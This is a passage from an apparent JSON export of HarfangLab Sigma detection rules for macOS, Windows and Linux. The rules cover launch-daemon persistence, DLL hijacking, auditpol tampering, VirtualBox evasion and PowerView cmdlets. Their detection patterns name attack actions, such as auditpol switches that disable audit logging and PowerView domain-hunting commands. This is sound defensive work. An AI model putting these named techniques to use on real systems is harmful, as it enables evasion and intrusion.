/Users/*/Library/LaunchAgents/com.google.GoogleUpdater.wake.plist'\n\n exclusion_adobe:\n CommandLine:\n - '/bin/launchctl load -wF /Library/Application Support/../LaunchAgents/com.adobe.AdobeDesktopService.plist'\n - '/bin/launchctl load -wF /Library/Application Support/../LaunchAgents/com.adobe.AdobeCreativeCloud.plist'\n ProcessAncestors|contains: '.app/Contents/MacOS/Install'\n\n exclusion_olfeo:\n ProcessParentImage: '/usr/local/bin/trustlane_authentication_agent'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ff36646-f412-456e-a97f-42ac3798d2c3",
"rule_name": "New Launch Daemon Added via Command-line",
"rule_description": "Detects a new Launch Daemon being added via command line (launchctl).\nLaunch Daemons are plist files used to interact with Launchd, the service management framework used by macOS.\nLaunch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction.\nAn attacker may create or modify Launch Daemons to execute malicious payloads as a way to establish persistent access.\nIt is recommended to check the content of the newly created plist file for malicious content.\n",
"rule_creation_date": "2024-06-26",
"rule_modified_date": "2026-02-19",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1543.001",
"attack.t1543.004",
"attack.t1569.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "600f91f8-20f2-43d2-809e-26648abf6ff8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589691Z",
"creation_date": "2026-03-23T11:45:34.589702Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589716Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bitlockerdeviceencryption.yml",
"content": "title: DLL Hijacking via BitLockerDeviceEncryption.exe\nid: 600f91f8-20f2-43d2-809e-26648abf6ff8\ndescription: |\n Detects potential Windows DLL Hijacking via BitLockerDeviceEncryption.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BitLockerDeviceEncryption.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dsreg.dll'\n - '\\fveskybackup.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "600f91f8-20f2-43d2-809e-26648abf6ff8",
"rule_name": "DLL Hijacking via BitLockerDeviceEncryption.exe",
"rule_description": "Detects potential Windows DLL Hijacking via BitLockerDeviceEncryption.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "601244c8-07d1-4169-b531-71204251c443",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623836Z",
"creation_date": "2026-03-23T11:45:34.623838Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623842Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings",
"https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gpac/77878370-0712-47cd-997d-b07053429f6d",
"https://www.microsoft.com/en-us/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
"https://strontic.github.io/xcyclopedia/library/auditpol.exe-A5452C41FBF27E4CDBE3E41893DDE72D.html",
"https://attack.mitre.org/techniques/T1562/002/"
],
"name": "t1562_002_auditpol_tampering.yml",
"content": "title: Audit Policy Tampered via Auditpol\nid: 601244c8-07d1-4169-b531-71204251c443\ndescription: |\n Detects when a group or category of the audit policy is cleared or disabled.\n This technique is used by attackers to disable common telemetry sources, such as the Windows Event Log.\n The first two references of this alert point to Microsoft's documentation on the different audit (sub)categories.\n It is recommended to investigate which categories were disabled and what they affect to determine if the action is legitimate.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings\n - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gpac/77878370-0712-47cd-997d-b07053429f6d\n - https://www.microsoft.com/en-us/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\n - https://strontic.github.io/xcyclopedia/library/auditpol.exe-A5452C41FBF27E4CDBE3E41893DDE72D.html\n - https://attack.mitre.org/techniques/T1562/002/\ndate: 2023/02/14\nmodified: 2026/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\auditpol.exe'\n - OriginalFileName: 'AUDITPOL.EXE'\n\n selection_current_dir:\n CurrentDirectory|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\\\?Recycle.Bin\\'\n\n cmd_set_disable:\n CommandLine|contains|all:\n - 'category:' # /category, /subcategory\n - ':disable' # /(success|failure):disable\n - '?set' # (-|/)set\n\n cmd_remove_users:\n CommandLine|contains|all:\n - ' ?remove'\n - ' ?allusers'\n\n cmd_clear_logs:\n CommandLine|contains|all:\n - ' ?clear'\n - ' ?y'\n\n exclusion_ocs_inventory:\n Ancestors|contains:\n - '?:\\Program Files\\OCS Inventory Agent\\OcsService.exe'\n - '?:\\Program Files (x86)\\OCS Inventory Agent\\OcsService.exe'\n\n # https://www.microsoft.com/en-us/download/details.aspx?id=55319\n exclusion_security_compliance_toolkit:\n CurrentDirectory|endswith: '\\Windows 11 v24H2 Security Baseline\\Scripts\\'\n\n exclusion_sccm:\n ProcessAncestors|contains:\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n - '?:\\MININT\\Tools\\X64\\TsmBootstrap.exe'\n\n exclusion_provconnect:\n ProcessAncestors|contains: '?:\\Program Files\\proVconnect\\proVconnect Device Agent\\Device Agent\\bin\\proVconnect.Agent.Windows.exe'\n\n exclusion_lgpo:\n ProcessParentImage|endswith: '\\LGPO.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_avacee:\n CommandLine: '?:\\Windows\\SysWOW64\\auditpol.exe /set /subcategory:Logon /success:disable'\n Image: '?:\\Windows\\System32\\msiexec.exe'\n CurrentDirectory: '?:\\Program Files\\Avacee\\sip_agent\\'\n\n exclusion_cisco:\n ParentImage: '?:\\Program Files\\Cisco\\AMP\\\\*\\sfc.exe'\n\n condition: all of selection_* and 1 of cmd_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "601244c8-07d1-4169-b531-71204251c443",
"rule_name": "Audit Policy Tampered via Auditpol",
"rule_description": "Detects when a group or category of the audit policy is cleared or disabled.\nThis technique is used by attackers to disable common telemetry sources, such as the Windows Event Log.\nThe first two references of this alert point to Microsoft's documentation on the different audit (sub)categories.\nIt is recommended to investigate which categories were disabled and what they affect to determine if the action is legitimate.\n",
"rule_creation_date": "2023-02-14",
"rule_modified_date": "2026-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "60216eac-5738-459f-b61a-eadceb37d9fd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611602Z",
"creation_date": "2026-03-23T11:45:34.611606Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611613Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
"https://attack.mitre.org/techniques/T1564/006/"
],
"name": "t1564_006_susp_virtualbox_headless_linux.yml",
"content": "title: VirtualBox Virtual Machine Started via VBoxHeadless (Linux)\nid: 60216eac-5738-459f-b61a-eadceb37d9fd\ndescription: |\n Detects the usage of VboxHeadless.exe to start a VM.\n Adversaries may deploy virtual machines to conduct malicious behavior and evade defenses.\n It is recommended to investigate process that spawned VBoxHeadless.exe, and check the legitimacy of the started virtual machine.\nreferences:\n - https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/\n - https://attack.mitre.org/techniques/T1564/006/\ndate: 2024/08/28\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.006\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Virtualization\nlogsource:\n product: linux\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/VBoxHeadless'\n\n filter_vbox:\n ParentImage|endswith: '/vboxsvc'\n\n filter_vagrant:\n Ancestors|contains: 'vagrant'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "60216eac-5738-459f-b61a-eadceb37d9fd",
"rule_name": "VirtualBox Virtual Machine Started via VBoxHeadless (Linux)",
"rule_description": "Detects the usage of VboxHeadless.exe to start a VM.\nAdversaries may deploy virtual machines to conduct malicious behavior and evade defenses.\nIt is recommended to investigate process that spawned VBoxHeadless.exe, and check the legitimacy of the started virtual machine.\n",
"rule_creation_date": "2024-08-28",
"rule_modified_date": "2025-01-30",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "60c69b67-1825-42a8-bfa3-cfe816b7923a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595770Z",
"creation_date": "2026-03-23T11:45:34.595773Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595781Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://powersploit.readthedocs.io/en/stable/Recon/README/",
"https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1",
"https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-powerview",
"https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/software/S0194/"
],
"name": "t1059_001_powershell_malicious_cmdlet_powerview.yml",
"content": "title: Malicious PowerShell PowerView Commandlets\nid: 60c69b67-1825-42a8-bfa3-cfe816b7923a\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the PowerSploit framework.\n PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.\n This specific commandlets is part of PowerView module of PowerSploit which is series of functions that performs network and Windows domain enumeration and exploitation.\n It is recommended to analyze actions taken by the PowerShell host process as well as to look for other suspicious activities on the host.\nreferences:\n - https://powersploit.readthedocs.io/en/stable/Recon/README/\n - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1\n - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-powerview\n - https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/software/S0194/\ndate: 2022/07/21\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.s0194\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.PowerSploit\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n # enumerate -1000+ modifable ACLs on a specified domain\n - 'Invoke-ACLScanner'\n\n # check if the current user context has local administrator access to a specified host\n - 'Invoke-CheckLocalAdminAccess'\n # queries all saved RDP connection entries on a target host\n - 'Get-CachedRDPConnection'\n\n # takes a user/group and makes machines they have effective rights over through GPO enumeration and correlation\n - 'Find-GPOLocation'\n # takes a computer and determines who has admin rights over it through GPO enumeration\n - 'Find-GPOComputerAdmin'\n\n # finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines\n - 'Invoke-UserHunter'\n # finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users\n - 'Invoke-StealthUserHunter'\n # hunts for processes with a specific name or owned by a specific user on domain machines\n - 'Invoke-ProcessHunter'\n # hunts for user logon events in domain controller event logs\n - 'Invoke-UserEventHunter'\n\n # enumerates users who are in groups outside of their principal domain\n - 'Find-ForeignUser'\n # enumerates all the members of a domain's groups and finds users that are outside of the queried domain\n - 'Find-ForeignGroup'\n # try to build a relational mapping of all domain trusts\n - 'Invoke-MapDomainTrust'\n\n # finds (non-standard) shares on hosts in the local domain\n - 'Invoke-ShareFinder'\n # finds potentially sensitive files on hosts in the local domain\n - 'Invoke-FileFinder'\n # finds machines on the domain that the current user has local admin access to\n - 'Find-LocalAdminAccess'\n # finds systems likely vulnerable to common exploits\n - 'Get-ExploitableSystem'\n # enumerates members of the local Administrators groups across all machines in the domain\n - 'Invoke-EnumerateLocalAdmin'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "60c69b67-1825-42a8-bfa3-cfe816b7923a",
"rule_name": "Malicious PowerShell PowerView Commandlets",
"rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the PowerSploit framework.\nPowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.\nThis specific commandlets is part of PowerView module of PowerSploit which is series of functions that performs network and Windows domain enumeration and exploitation.\nIt is recommended to analyze actions taken by the PowerShell host process as well as to look for other suspicious activities on the host.\n",
"rule_creation_date": "2022-07-21",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6119d31f-e510-43d1-9d78-fb427e5e1e65",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095970Z",
"creation_date": "2026-03-23T11:45:34.095971Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095976Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_upfc.yml",
"content": "title: DLL Hijacking via upfc.exe\nid: 6119d31f-e510-43d1-9d78-fb427e5e1e65\ndescription: |\n Detects potential Windows DLL Hijacking via upfc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'upfc.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith: '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6119d31f-e510-43d1-9d78-fb427e5e1e65",
"rule_name": "DLL Hijacking via upfc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via upfc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61392ba5-1afb-4268-9fd4-f2a5387dbecd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602744Z",
"creation_date": "2026-03-23T11:45:34.602748Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602755Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dxgiadaptercache.yml",
"content": "title: DLL Hijacking via dxgiadaptercache.exe\nid: 61392ba5-1afb-4268-9fd4-f2a5387dbecd\ndescription: |\n Detects potential Windows DLL Hijacking via dxgiadaptercache.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dxgiadaptercache.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d3d11.dll'\n - '\\d3d12.dll'\n - '\\dxgi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61392ba5-1afb-4268-9fd4-f2a5387dbecd",
"rule_name": "DLL Hijacking via dxgiadaptercache.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dxgiadaptercache.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "613c9778-02e2-4a21-b3ee-cbad7550f413",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622432Z",
"creation_date": "2026-03-23T11:45:34.622434Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622438Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://stmxcsr.com/persistence/looking-at-the-startup-directory.html",
"https://twitter.com/1ZRR4H/status/1575364101148114944",
"https://twitter.com/AnFam17/status/1658666291308163072",
"https://www.netskope.com/fr/blog/asyncrat-using-fully-undetected-downloader",
"https://blog.talosintelligence.com/asyncrat-3losh-update/",
"https://attack.mitre.org/techniques/T1059/005/",
"https://attack.mitre.org/techniques/T1547/"
],
"name": "t1059_005_susp_vbs_to_bat_tree.yml",
"content": "title: Suspicious Execution of Batch or Command File by VBS Script\nid: 613c9778-02e2-4a21-b3ee-cbad7550f413\ndescription: |\n Detects a suspicious execution of a Batch or Command file from a VBS script.\n This execution tree is often exploited by attackers as a way to evade defenses and load malware.\n Due to nature of these scripts, we have excluded some common paths where these scripts may be placed.\n If you wish to investigate persistence in your network through this method in paths that aren't covered by this rule, you may investigate the scripts present in the paths excluded.\n It is recommended to create a job to download the different scripts associated with this process tree, and investigate them for malicious content.\n It is also recommended to create whitelists for this rule, as these scripts may also be used by system administrators to automate certain tasks and cause false positives.\n An investigative guide is also present in the first link of references.\nreferences:\n - https://stmxcsr.com/persistence/looking-at-the-startup-directory.html\n - https://twitter.com/1ZRR4H/status/1575364101148114944\n - https://twitter.com/AnFam17/status/1658666291308163072\n - 